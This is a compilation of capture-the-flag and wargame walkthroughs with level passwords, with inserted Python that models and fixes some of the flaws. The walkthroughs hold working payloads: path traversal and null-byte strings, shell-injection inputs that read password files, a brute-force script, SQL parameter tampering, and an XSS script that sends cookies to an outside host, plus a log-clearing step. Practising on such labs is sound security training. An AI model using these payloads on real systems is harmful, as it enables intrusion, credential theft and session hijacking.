Directory traversal Attacks

Web Security Academy Labs

File path traversal, simple case

image?filename=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
…

File path traversal, traversal sequences blocked with absolute path bypass

image?filename=/etc/passwd

File path traversal, traversal sequences stripped non-recursively

?filename=....//....//....//etc/passwd

File path traversal, traversal sequences stripped with superfluous URL-decode

?filename=..%252f..%252f..%252fetc/passwd

The first decode turns this into ..%2f..%2f..%2fetc/passwd, which passes the traversal filter; the superfluous second decode then turns it into ../../../etc/passwd.

File path traversal, validation of start of path

?filename=/var/www/images/../../../etc/passw

File path traversal, validation of file extension with null byte bypass

?filename=../../../etc/passwd%00.jpg
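The five labs above each defeat one incomplete filter. The following Python is an added example (not part of the Web Security Academy material) that reproduces those filters so their gaps are visible, and then shows a check that holds: decode once, reject NUL bytes, canonicalise the joined path, and compare the result against the web root. The web root `/var/www/images` and the helper names are assumptions for the example.

```python
import os
import urllib.parse

# Constructed web root for the example; the same logic applies to any directory.
WEB_ROOT = "/var/www/images"

# --- The filters the labs bypass, reproduced so their gaps are visible ---

def strip_once(name):
    """Non-recursive stripping: each '../' is removed once, so '....//' collapses to '../'."""
    return name.replace("../", "")

def strip_then_decode(name):
    """Strips traversal sequences, then the server URL-decodes a second time."""
    return urllib.parse.unquote(strip_once(urllib.parse.unquote(name)))

def starts_with_root(name):
    """Prefix check on the raw string; '/var/www/images/../../../etc/passwd' passes."""
    return name.startswith(WEB_ROOT + "/")

def ends_with_image_ext(name):
    """Extension check on the raw string; a null byte lets '.jpg' trail a C-string path."""
    return name.lower().endswith((".jpg", ".png", ".gif"))

# --- A check that holds: decode once, reject NUL, canonicalise, then compare real paths ---

def resolve_safely(user_value, root=WEB_ROOT):
    """Return the absolute path to serve, or None if the request escapes the root."""
    name = urllib.parse.unquote(user_value)      # exactly one decode
    if "\x00" in name:                           # NUL never belongs in a file name
        return None
    # Always join relative to the root: an absolute user path would otherwise replace it.
    candidate = os.path.normpath(os.path.join(root, name.lstrip("/")))
    root_norm = os.path.normpath(root)
    # Compare canonical paths, not strings; in production use os.path.realpath so
    # symlinks inside the root are resolved before the comparison.
    if candidate != root_norm and not candidate.startswith(root_norm + os.sep):
        return None
    if not candidate.lower().endswith((".jpg", ".png", ".gif")):
        return None
    return candidate
```

Each weak filter returns the "safe" answer for its lab payload, while `resolve_safely` rejects all five payloads and only accepts names that canonicalise to a file under the root.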

Over The Wire: Natas Solutions Levels 0-10

The following is my write up to solving the challenges 0-10 in Natas Wargame presented by overthewire.org

Level 1

Logging in with natas0 / natas0 as the directions say, a pop-up box tells me the password is somewhere on that page.  Inspecting the source, I can see the password.

gtVrDuiDfck831PqWsLEZy5gyDz1clto


Level 2

Viewing the source code I find a link to another file.  Navigating to the /file directory I get the password to level 3.

sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14


Level 3

Upon logging into level 3 and viewing the source code I find a clue: “…not even Google will find it this time.”

A robots.txt file lists the files on the website that are not to be crawled by Google.  Browsing to robots.txt, I see that a directory called ‘s3cr3t’ is referenced. Upon navigating to that directory, I see a ‘password’ file. Clicking it gives me the password to the next level.

Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ


Level 4

After logging in I’m presented with the following:

For this I installed the Firefox addon ‘Tamper Data’, which allows me to capture and edit my HTTP request before it is sent to the server.  I change the Referer header to http://natas5.natas.labs.overthewire.org and refresh the page.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq


Level 5

After logging in to level 5, I’m presented with the following:

Looking at the source code doesn’t provide any further clues.  For this challenge I installed a chrome extension that allowed me to edit the cookie and change the ‘logged in’ variable from 0 to 1.  After reloading the page, voila, I’m presented with the password to the next level.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

After logging in to level 6, I am presented with the following:
Checking out the source code I see the following:
I click the link ‘index-source.html’, and see a file named ‘secret.inc’ has been included:
Navigating to http://natas6.natas.labs.overthewire.org/includes/secret.inc, I am provided the password to the next level.



Level 7

After logging in to level 7, I am presented with the following 2 links:
When clicking ‘home’ I notice the url changes to natas7.natas.labs.overthe…./index.php?page=home
Now, checking out the source code I am given the following clue:
I appended ‘/etc/natas_webpass/natas8’ to the end of the url following the ‘page=’ parameter and see I was able to traverse the directory and obtain the password to the next level.
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8

Logging into level 8, I’m presented with the following:


Checking out the sourcecode I’m given a clue:


I’m given the secret in encoded form, the methods used to encode it, and the order in which the methods were applied.  To solve this level, I run php in interactive mode (-a) to decode the secret using the following commands:


I submit the secret ‘oubWYf2kBq’ and receive the password for the next level.



Level 9

Upon logging in to level 9, I am presented with the following:


Checking out the source code I see another php script is being used:


I see that the script is grepping the dictionary file for whatever I submit, and that the input is spliced straight into a shell command, so I can chain commands together with the shell command separator ;. Thinking back to Natas 7, I learned that the passwords are stored in /etc/natas_webpass/respectiveLevel and construct a chained command using this knowledge:

grep -i ; cat /etc/natas_webpass/natas10 # dictionary.txt

The # at the end of my input comments out everything the script appends after it, so the dictionary.txt argument is ignored and only /etc/natas_webpass/natas10 is read. From there I am given my password to the next level:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
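The chaining above works only because the search term is pasted into a command string that a shell then parses. The Python below is an added example (not the Natas challenge's own code) that reproduces the flaw against constructed files in a temporary directory, and beside it the two layers of the fix: passing the term as a single argv element with no shell, and validating it against an allowlist before it reaches any command. The sandbox files, `natas10_password.txt` as a stand-in for the protected file, and the function names are all assumptions for the example; it needs `grep` on the PATH.

```python
import os
import re
import shutil
import subprocess
import tempfile

def make_sandbox():
    """Constructed working directory: a dictionary plus a stand-in for the protected file."""
    workdir = tempfile.mkdtemp()
    with open(os.path.join(workdir, "dictionary.txt"), "w") as f:
        f.write("apple\nbanana\ncherry\n")
    with open(os.path.join(workdir, "natas10_password.txt"), "w") as f:
        f.write("CONSTRUCTED_SECRET\n")       # not a real password
    return workdir

def remove_sandbox(workdir):
    shutil.rmtree(workdir, ignore_errors=True)

def vulnerable_search(needle, workdir):
    """Builds 'grep -i <input> dictionary.txt' as a string and hands it to /bin/sh,
    so ';' and '#' in the input are interpreted by the shell."""
    cmd = "grep -i " + needle + " dictionary.txt"
    proc = subprocess.run(cmd, shell=True, cwd=workdir, capture_output=True, text=True)
    return proc.stdout

def argv_search(needle, workdir):
    """Layer one: no shell. The whole input is one argv element, so ';' is just a
    character in the pattern and grep looks for it literally."""
    proc = subprocess.run(["grep", "-i", "--", needle, "dictionary.txt"],
                          cwd=workdir, capture_output=True, text=True)
    return proc.stdout

SAFE_NEEDLE = re.compile(r"[A-Za-z0-9_-]{1,64}")

def hardened_search(needle, workdir):
    """Layer two: allowlist validation before the value reaches any command at all."""
    if not SAFE_NEEDLE.fullmatch(needle):
        raise ValueError("search term must be 1-64 word characters")
    return argv_search(needle, workdir)

if __name__ == "__main__":
    d = make_sandbox()
    payload = "; cat natas10_password.txt #"
    print("shell string :", repr(vulnerable_search(payload, d)))   # leaks the stand-in secret
    print("argv, no shell:", repr(argv_search(payload, d)))        # no match, nothing leaked
    print("validated    :", repr(hardened_search("BAN", d)))       # 'banana\n'
    remove_sandbox(d)
```

The `--` in the argv form stops grep from reading a term that begins with `-` as an option, which is the one remaining way user input could change the command's behaviour once the shell is out of the picture.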


Level 10


Overthewire: Leviathan Solutions

The following is a walk through on how to solve the Leviathan wargame featured on Overthewire.org.  For this wargame, we ssh on port 2223 to access the levels.  Passwords for each level reside in the /etc/leviathan_pass directory.  Files for each level reside in the /home directory.

The username and password is provided for level 0.
username: leviathan0
password: leviathan0


Level 0

ssh leviathan0@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password ‘leviathan0’

Running ls -la we’ll check what’s in our directory:
leviathan0@leviathan:~$ ls -la
total 24
drwxr-xr-x  3 root       root       4096 Nov 13 16:03 .
drwxr-xr-x 10 root       root       4096 Nov 13 16:03 ..
drwxr-x---  2 leviathan1 leviathan0 4096 Nov 13 16:03 .backup
-rw-r--r--  1 root       root        220 Sep  1  2015 .bash_logout
-rw-r--r--  1 root       root       3771 Sep  1  2015 .bashrc
-rw-r--r--  1 root       root        655 Jun 24  2016 .profile

The .backup directory looks promising.
leviathan0@leviathan:~$ cd .backup/
leviathan0@leviathan:~/.backup$ ls
bookmarks.html

cat bookmarks.html and run a search in your console for the word ‘password’.  You will find the following line:
the password for leviathan1 is rioGegei8m


Level 1

ssh leviathan1@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we found in the previous level:
rioGegei8m

Running ls we see an executable in our folder named ‘check’.  Running ltrace on the executable gives us the following information:

leviathan1@leviathan:~$ ltrace ./check
__libc_start_main(0x804858d, 1, 0xffffd6f4, 0x8048670
printf("password: ") = 10
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bbpassword: nnnn
) = 110
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bb) = 110
getchar(0x80486f0, 0, 0xf7e45830, 0x80486bb) = 110
strcmp("nnn", "sex") = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
) = 29
+++ exited (status 0) +++

First, we must understand what the ‘strcmp’ function does.
strcmp("str1", "str2")
This function starts comparing the first character of each string. If they are equal to each other, it continues with the following pairs until the characters differ or until a terminating null-character is reached.

From this we can see the executable prompts us for the password and compares it against the word “sex”.  Therefore, entering “sex” as the password will give us a shell.  From there all we have to do is cat the contents of ‘leviathan2’ from the /etc/leviathan_pass directory.

leviathan1@leviathan:~$ ./check
password: sex
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta


Level 3

ssh leviathan3@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password we identified in the previous level:
ougahZi8Ta
Let’s run ‘ls -la’ to see what’s inside our directory and view the permissions of the files.

leviathan3@leviathan:~$ ls -la
total 32
drwxr-xr-x  2 root       root        4096 Nov 13 16:03 .
drwxr-xr-x 10 root       root        4096 Nov 13 16:03 ..
-rw-r--r--  1 root       root         220 Sep  1  2015 .bash_logout
-rw-r--r--  1 root       root        3771 Sep  1  2015 .bashrc
-rw-r--r--  1 root       root         655 Jun 24  2016 .profile
-r-sr-x---  1 leviathan4 leviathan3 10176 Nov 13 16:03 level3

We find another executable entitled ‘level3’.  Let’s run it to see what it does.
leviathan3@leviathan:~$ ./level3
Enter the password> 123
bzzzzzzzzap. WRONG

Now run an ltrace to see which libraries are being called.
leviathan3@leviathan:~$ ltrace ./level3
__libc_start_main(0x804867e, 1, 0xffffd6f4, 0x8048750
strcmp("h0no33", "kakaka") = -1
printf("Enter the password> ") = 20
fgets(Enter the password> 123
"123\n", 256, 0xf7fc75a0) = 0xffffd4ec
strcmp("123\n", "snlprintf\n") = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++

Examining the trace, we can see that after we enter the password ‘123’, strcmp compares it against the string ‘snlprintf’.  So if we enter ‘snlprintf’ as the password, it should work.
leviathan3@leviathan:/tmp/emily1$ ./level3
Enter the password> snlprintf
[You've got shell]!
From there, we simply cat the contents of the file /etc/leviathan_pass/leviathan4
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Level 4

ssh leviathan4@leviathan.labs.overthewire.org -p 2223
When prompted, enter the password we located in the previous level:
vuH0coox6m

Run ls -la to see what is inside our directory.

leviathan4@leviathan:~$ ls -la
total 24
drwxr-xr-x  3 root root       4096 Nov 13 16:03 .
drwxr-xr-x 10 root root       4096 Nov 13 16:03 ..
-rw-r--r--  1 root root        220 Sep  1  2015 .bash_logout
-rw-r--r--  1 root root       3771 Sep  1  2015 .bashrc
-rw-r--r--  1 root root        655 Jun 24  2016 .profile
dr-xr-x---  2 root leviathan4 4096 Nov 13 16:03 .trash

The trash directory looks interesting, let’s change into it.
cd .trash

Run ls -la again.
leviathan4@leviathan:~/.trash$ ls -la
total 16
dr-xr-x---  2 root       leviathan4 4096 Nov 13 16:03 .
drwxr-xr-x  3 root       root       4096 Nov 13 16:03 ..
-r-sr-x---  1 leviathan5 leviathan4 7460 Nov 13 16:03 bin

We see an executable called bin, running it outputs the following:
leviathan4@leviathan:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
Awesome!  Let’s convert that binary to text using an online application.  Doing so outputs the password to level 5:
Tith4cokei


Level 5

In our directory we find another executable ‘leviathan5’.  Let’s run it:
leviathan5@leviathan:~$ ./leviathan5
Cannot find /tmp/file.log

Now use ltrace to see what libraries are being used:
leviathan5@leviathan:~$ ltrace ./leviathan5
__libc_start_main(0x80485dd, 1, 0xffffd6e4, 0x8048680
fopen("/tmp/file.log", "r") = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
) = 26
exit(-1
+++ exited (status 255) +++
leviathan5@leviathan:~$

As we can see, the executable opens and reads the contents of /tmp/file.log.
I wonder if we can copy /etc/leviathan_pass/leviathan6 to the /tmp directory and then rename it file.log.  Let’s try:
leviathan5@leviathan:~$ cp /etc/leviathan_pass/leviathan6 /tmp
cp: '/etc/leviathan_pass/leviathan6' and '/tmp/leviathan6' are the same file
leviathan5@leviathan:~$ mv /tmp/leviathan6 /tmp/file.log

Now let’s run the executable again:
leviathan5@leviathan:~$ ./leviathan5
UgaoFee4li

Hooray!


Level 6

ssh leviathan6@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we identified in the previous level:
UgaoFee4li

In our directory, we find another executable called leviathan6.  Running it provides the following output:
leviathan6@leviathan:~$ ./leviathan6
usage: ./leviathan6

Run ltrace to see which libraries are being used:
leviathan6@leviathan:~$ ltrace ./leviathan6
__libc_start_main(0x804853d, 1, 0xffffd6e4, 0x80485d0
printf("usage: %s \n", "./leviathan6"usage: ./leviathan6
) = 35
exit(-1
+++ exited (status 255) +++

No helpful information can be inferred.  Let’s try to brute-force the 4-digit code using a simple bash script.
First make a temporary directory under /tmp and use nano to create a file named ‘brute.sh’.
leviathan6@leviathan:~$ mkdir /tmp/emily2
leviathan6@leviathan:~$ cd /tmp/emily2
leviathan6@leviathan:/tmp/emily2$ nano /tmp/emily2/brute.sh
Unable to create directory /home/leviathan6/.nano: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
In the editor we create our simple script:

#!/bin/bash
# Try every 4-digit code in turn; the binary drops into a shell on the right one.
for a in {0000..9999}
do
    ~/leviathan6 "$a"
done

Save the script and run chmod +x to make it executable.
Run the script, after a few seconds we can see the 4 digit code has been bruteforced and we have a shell, now all we have to do is run:
cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9


Level 7

ssh leviathan7@leviathan.labs.overthewire.org -p 2223
When prompted enter the password we located in the previous level:
ahy7MaeBo9

Then run ls to see what’s in our directory.  I see a file named ‘CONGRATULATIONS’, I cat it to see what it says:
leviathan7@leviathan:~$ ls
CONGRATULATIONS
leviathan7@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.

Hooray!  We have defeated the Leviathan Wargame on Overthewire.org!  Super easy, huh?

Hackthissite: Javascript Mission Solutions

Level 1

Challenge:


This level is super easy.  All you have to do is check the source code for the answer.  You will see the following:


As we can see, the function check(x) determines if x == cookies, if so we will get an alert that says ‘win!’.  Let’s enter ‘cookies’ as our password.  Bingo!


Level 2

Challenge:


We need to disable javascript to complete the mission.  You can download a browser extension that allows you to do so. I used the google chrome extension ‘quick javascript switcher’ to switch off javascript.  Next I click ‘take this challenge’ and am presented with the following link that says ‘click here to win!’  Right click your mouse and select inspect.  Expand the code and you will find the following link.  Clicking it will successfully complete the challenge.



Level 3

Challenge:


All it takes to solve this level is some simple math.  We see the correct answer is the length of the value ‘moo’.  Let’s solve for ‘moo’.

foo = 47

bar = 47%8 = 7

moo = 7 * 2 = 14

Entering a password with a length of 14 will successfully complete the challenge.


Level 4

Challenge:


Viewing the sourcecode we can see once again, function check(x) checks to see whether the password = RawrRawr.  In the very first line of the code we see RawrRawr = moo.  Entering moo should allow us to successfully beat the mission.


Level 5

Challenge:


Let’s check out the source code:


We can see the function check(x) checks to see whether x == moo and if so we’re able to successfully beat the challenge.  Line one tells us the unescaped value of moo which appears to be url encoded.  Using an online url decoder app, we can determine the password is ‘ilovemoo’.


Level 6

Challenge:


Let’s view the source code:


This code is all messed up, but thinking it through we can see we need to navigate to

https://hackthissite.org/missions/javascript/6/checkpass

to get the solution for the level.


The function checkpass(pass) says if pass == rawr+” “+moo, we’ve successfully defeated the challenge.  Above the code we can see rawr = “moo” and moo = “pwns”.  So if we enter moo pwns as the password it should be correct…and it is!


Level 7

Challenge:


Viewing the source code shows the following:


Clearly the javascript for this level’s password has been obfuscated.  We can use an online app to deobfuscate it.  The result is:

<button onclick='javascript:if (document.getElementById("pass").value=="j00w1n"){alert("You WIN!");window.location += "?lvl_password="+document.getElementById("pass").value}else {alert("WRONG! Try again!")}'>Check Password</button>

We can see the script checks to see if the value we enter equals j00w1n.  If so, we get the alert “You win!” in your browser.  Let’s try that password to successfully complete the challenge.

Hooray!  We’ve conquered the Javascript Missions on Hackthissite.org!

Hack This: Solutions for Real Missions

Level 1

Challenge:

Clicking on the email link, we are taken to our target’s email account.  We see 2 emails in the inbox and 1 in the trash with the subject ‘Password Request’ from the sender ustudio, the maker of World of Peacecraft.  Opening the email we’re presented with our target’s password,  awesome!  I noticed one of the emails in our target’s email box has the subject ‘Activate Account’ sent from World of Peacecraft.   Since we have the password we can easily login and successfully complete the mission.


Level 2

Challenge:

Clicking ‘library gateway’ we are presented with a login page.


We can check out the source code by right-clicking, selecting inspect and expanding the arrows.  Scanning function loadimage we can see the directory ‘members’ is referenced.  Appending ‘members’ to the end of our url takes us to the following page:

I click each link and find nothing useful.  Not knowing what else to do I entered ‘sam’ as the username and password.  Then tried luke and 9312 combo.  When I used the combo librarian sweetlittlebooks, I hit the jackpot and successfully completed the challenge.


Level 3

Challenge:

Clicking the login page link and inspecting the code gives us a clue:

Clicking on login.js we’re taken to the following page:

It is clear that this page holds the data of the users, and their passwords as well, but it is not in plain text. It has been encrypted as we can see from the login page’s source code.  But I’m not quite sure how to reverse engineer it so I try guessing what other files I can find.  When navigating to https://www.hackthis.co.uk/levels/extras/real/3/members.js I can see a list of member’s usernames and passwords.
Trying each allows us to successfully complete the challenge.


Level 4

Challenge:
We’re given 4 links to the following urls:

Safe Transfer: https://www.hackthis.co.uk/levels/extras/real/4/safetransfer/
Planet Bid: https://www.hackthis.co.uk/levels/extras/real/4/planetbid/account.php?admin
Top 10: https://www.hackthis.co.uk/levels/extras/real/4/top10.html
Email: https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php

Revoked.Mayhem mentioned the security of Planet Bid was weak, so head to that url first.  I click the link ‘admin’ and try all the passwords listed on ‘Top 10’.  Using the password ‘asdfg’ I successfully login.

The writer of the email didn’t mention what the item he’s trying to get payment for even was, so we’ve got to figure that out on our own.  I click ‘Bids’ and see that buyers and sellers are referred to by number.  I click ‘Members’ and find that Revoked.Mayhem is user number 31.  Referring back to the ‘Bids’ link we can see member number 11 is who he sold the item to.  Member number 11 is username: Nemisis with the email address jfelliot@mail.com.

I want access to Nemisis’ Safe Transfer account so I head to https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php and click ‘forgot password’. I enter his username and email address and get confirmation the password has been sent to his email address.  Now all we need to do is get access to his email address and read the message.

Heading over to https://www.hackthis.co.uk/levels/extras/real/4/email_beta/index.php, I enter ‘jfelliot’ as the username and cycle through the passwords listed on the ‘Top 10′ list to get access to the account but am unsuccessful.  Now what?

I head back to https://www.hackthis.co.uk/levels/extras/real/4/planetbid/view.php?members&1=user&2=email and note the information included in the url.  We can see a query is being executed to pull the member’s usernames and email addresses.  What if we replace ’email’ with ‘passwords’?  Doing so doesn’t give us the results I was hoping so I try using ‘pass’ instead.  Bingo!

The passwords appear to be hashed.  Let’s try to ‘crack’ user Nemisis’s hash using https://crackstation.net/.  Successful!

Nemisis’ password is chicken.  Using the name ‘jfelliot’ and password ‘chicken’ I am able to gain access to Nemisis’s email account.  Finally!  From there I’m able to find the email that was sent when I clicked ‘forgot password’ on the safe transfer login page.  Hooray, we found his pass!

I login to Nemisis’ account and transfer the amount owed to Revoked.Mayhem.  A whole 1.32.  Dumb.  Before I submit though I need to clear the logs at Planet Bids.
Click ‘view’ then ‘clear logs’.

Finally I am able to successfully complete the challenge.  This challenge was almost harder to explain than it was to solve.


Level 5

Challenge:

Clicking on ‘here it is’ we’re provided the following input box to enter the password and gain access to the site.

Checking the source code provides no useful information so let’s check to see whether the page is vulnerable to sql injection by inserting a ‘ at the end of our url.  Bingo.

Running a quick scan using sqlmap I’m informed the application is also vulnerable to file inclusion.

https://www.hackthis.co.uk/levels/extras/real/5/admin.php

Let’s modify the above url to the following: https://www.hackthis.co.uk/levels/extras/real/5/?p=admin.php and include two dots and a slash between ‘p=’ and ‘admin.php’ to try and traverse the directory tree.

https://www.hackthis.co.uk/levels/extras/real/5/?p=../admin.php.

Nada.  Let’s try adding a nullbyte to the end of the url as well

https://www.hackthis.co.uk/levels/extras/real/5/?p=../admin.php%00.

Bingo!  We’re presented with another input box.  Right clicking the mouse and selecting ‘inspect’ provides us the password to complete the level.


Level 6

Challenge:


Alternative homepage:


Target website:


Now let us think for a moment. There are no accounts to steal. Anything sent through the contact form would, presumably, be mailed to the admin of the website. Considering that, how would we perform an intrusion?

Not knowing where to start, I did my research. Pruning the various less-than-helpful resources I found, there is this XSS cookie stealing guide which, to any PHP programmer, will look very easy to understand. My knowledge of PHP is limited, as I only did some self-teaching around two years ago, but it is sufficient to understand the script at the bottom. In simple terms, it explains how to steal the admin’s cookie. With said cookie and some cookie editing, we could easily gain admin access to the website and deface it.

This will display the cookie of the chosen webpage. The problem? The text box in the contact form will truncate messages that are longer than 25 characters.

So, we work around this limitation by doing this:

<script>document./*
*/location="http://"+/*
*/"real6.hol"+/*
*/".es/c.php?c"+/*
*/"="+document.cookie;/*
*/</script>

The messages must be sent from last to first, in order. This is because, if you look at the source code of the page, each new message will be added on top of the older one, meaning the first piece of our script needs to be inserted last. The comment delimiters (/* and */) help us “cancel out” the code of the page so that our script is unadulterated.
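The reassembly trick above depends on two things in the contact form's rendering: messages are inserted as raw HTML, and the newest one lands on top. The Python below is an added example (not the mission's own code) that models that rendering, shows the six fragments reassembling into one script once block comments are dropped, and beside it the rendering that defeats the trick by HTML-escaping every message before insertion. The page layout, the fragment list and the helper names are assumptions for the example.

```python
import html
import re

# The six fragments from the write-up, in the order they must be SENT (last piece of the
# script first), each within the 25-character limit of the contact form.
FRAGMENTS = [
    "*/</script>",
    '*/"="+document.cookie;/*',
    '*/".es/c.php?c"+/*',
    '*/"real6.hol"+/*',
    '*/location="http://"+/*',
    "<script>document./*",
]

def fits_limit(fragments, limit=25):
    """True when every fragment would survive the form's truncation."""
    return all(len(f) <= limit for f in fragments)

def vulnerable_render(messages):
    """Newest message on top, inserted as raw HTML: the rendering the trick relies on."""
    return "\n".join(reversed(messages))

def hardened_render(messages):
    """Same layout, but each message is escaped, so '<' becomes '&lt;' and never opens a tag."""
    return "\n".join(html.escape(m, quote=True) for m in reversed(messages))

def assembled_script(rendered):
    """What a browser would execute: the body of the first <script> element with the
    /* ... */ block comments removed. None when no script element is present."""
    m = re.search(r"<script>(.*?)</script>", rendered, re.S)
    if not m:
        return None
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S)

if __name__ == "__main__":
    print(assembled_script(vulnerable_render(FRAGMENTS)))   # one working statement
    print(assembled_script(hardened_render(FRAGMENTS)))     # None: nothing executes
```

Escaping on output removes the injection; marking the admin's session cookie `HttpOnly` is the second layer, since `document.cookie` cannot read an `HttpOnly` cookie even if a script does run.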

Indeed, it does function, in theory. But we read something about the webmasters being security folk, which means they are unlikely to fall for such a trick. We need a stealthier way of penetrating their defenses.

So, instead of embedding our script in simple text, we load it through an image instead. A fake image, naturally.

Take note that you should upload your PHP file on your own server for this to work, because later on, you will need to access the log.txt file, where the admin’s login information will be stored. You can either set up a server on your physical (or virtual) machine, or use a free hosting website, for this purpose.

My log.txt file had a relevant entry which recited as follows:

IP: 85.159.213.101 | PORT: 57719 | HOST: | Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34 | METHOD: | REF: | DATE: Tuesday 28th 2015f July 2015 11:03:07 AM | COOKIE: =SecureSess=ukuy2lloirb5ipb9

Results may vary, but they will stand out from the other logged accesses regardless, especially as the cookie will not have the SecureSess parameter otherwise.

After gaining this cookie, we go back to the SecureUs website homepage and edit our session cookie with a tool such as EditThisCookie (Chrome add-on), and add the SecureSess parameter to our session, with the value indicated in the log. If you are using EditThisCookie, check the “Secure” and “Session” boxes. If you are editing your cookie in another way, do something analogous. After we are done modifying the cookie, we simply refresh the page.

If you followed all steps properly, the level should now be passed.

Hackertest Solutions Levels 1-20

Level 1

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

Source:

<body onLoad=password()>

{
var a="null";
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
}
else
{
alert ("Try again");
}
}
}

From the source code we can tell function check() checks to see whether the user input is equal to a.  In the first line the code tells us var a = “null” so that should be the correct password.


Level 2

For this level the password is again included in the source code:

var pass, i;
pass=prompt("Please enter password!","");
if (pass=="l3l") {
window.location.href="http://www.hackertest.net/"+pass+".htm";
i=4;
}


Level 3 and 4

Source:

<body onload=javascript:pass(); alink="#000000">

function pass()
{
var pw, Eingabe;
pw=window.document.alinkColor; // pw=#000000
Eingabe=prompt ("Please enter password");
if (Eingabe==pw) // if prompt for password = #000000
{
window.location.href=String.fromCharCode(97,98,114,97,101)+".htm";
}
else
{
alert("Try again");
}
}


String.fromCharCode(97,98,114,97,101) is decoded as abrae -> Navigate to http://www.hackertest.net/abrae.htm for the win.

Level 5

Upon clicking the link to the next challenge as instructed, you’re prompted to enter a password.  Press ESC and note you’re redirected to the previous page.  View the source code of that page and note the hyperlink to the next challenge.  Click it.  Therein lies the password.


Level 6

Source:

<!--
var pass, i;
//-->
</script>
<h1>Hacker Test</h1>
<p>Test your hacking skills</p>
<br><br>
<h1>Level 6</h1>http://strongpsswd.js/strong
<br><br>
<center><p>Try again ...</p></center>

Click passwd.js

<!--
var pass;
pass=prompt("Password:","");
if (pass=="hackertestz") {
window.location="included.htm";
}else
alert("Try again...");
//-->


Level 7

Source:


For challenges like these, be sure to click on and navigate to any links that are included.  Navigating to /images/included.gif, the password is written in small font on the lower right hand side of the screen.


Level 8


Navigate to phat.php.


Then to ‘images/phat.gif’

We are given another clue written in teeny font on the lower right hand side of the screen.  It says ‘look for a PhotoShop Document’ -> PSD.  Change phat.php to phat.psd, a file gets downloaded.  Open the file with gimp.


The password is hidden in this picture in the bottom right hand corner of the screen.  To view it unobstructed just move the other layers out of the way until the text is fully revealed.


Level 9

For this level we’re told to ‘crack the password’.  When we click to view the source code we’re told ‘no source code is provided for this level’.  Instead use ‘inspect’ and expand the code to find the password.


From looking at it I can see it’s been base64 encoded.  There are many sites where you can decode the value.  Navigate to http://www.hackertest.net/gazebruh.php for level 10.


Level 10


At first look, we can already see something’s up as random letters in the top paragraph are italicized.  I bet that’s our password.  Now we’re presented with the following error message on the page.

Warning: Cannot modify header information - headers already sent by (output started at /home3/jskenned/public_html/hackertest/gazebruh.php:12) in /home3/jskenned/public_html/hackertest/gazebruh.php on line 58

Append /hackertest/gazebryh.php to the end of the url. Check the source:


Level 11

Again let’s check the source:


Navigating to ‘images/try.gif’ we get a page that has ‘nice try’ written in teeny letters at the bottom right hand corner.  Back to the source, at the top written in the meta robots field content says “goto: clipart.php”


Level 12

The page contains the message: “3 letters change everything. Look carefully!”  Check the source:


In the meta named ‘clue’ it says “use graphic software”.  Click on ‘images/logo/jpg’ and zoom in super close.  In large letters written across Europe it says puta.php.


Level 13

The meta in the source says same as before ‘use graphic software’.  Further down the page gives us the answer.


Navigate to the gif and zoom in super close, it says 4xml.php


Level 14

Checking the source we’re given the same clue to use graphic software.


Click the bidvertiser.gif link and download the file.


Open the file using gimp.


Level 15

We’re given the following message:

Since you still have your photoshop open, check this out: images/pass2level16.jpg << good luck with it!

Download the file and open with gimp.

-image is unavailable

hmmmm….I guess try unavailable?


Append ‘/images’ at the end of ‘unavailable’ and check the source code.

<body background="bg.jpg">

Download file and open with text editor.  You’ll find Ducky.php.  Append that to the url following /unavailable.


Level 16

We’re presented with a password input box.  Again check the source code.  Written about halfway down it says ‘password: your ip address’.  To get that open a terminal and type ‘curl icanhazip.com’.


Level 17


Checkout /unavailable/../level18.shtml then check the source.  Check out under ‘images’ directory n00b.gif.  In the lower right hand corner it says “like a noob!…”  Oh, duh..enter n00b as the password.


Level 18

Think like a n00b.

You will need to enable cookies for the Hacker Test Admin Panel to work as expected.

Password:

If you are looking in the script, you are too far, go back.

Download ‘images/n00b.gif’ and open it with gimp.

Level 20

http://hackertest.com/gazebruh2.htm

Root-Me Web Server Challenge Solutions

The following is a walk through to solving root-me.org’s web server challenges (work in progress).

HTML

As always, check the source code for the password.

nZ^&@q5&sjJHev0


Command Injection

127.0.0.1;cat index.php

flag: S3rv1ceP1n9Sup3rS3cure


Open Redirect

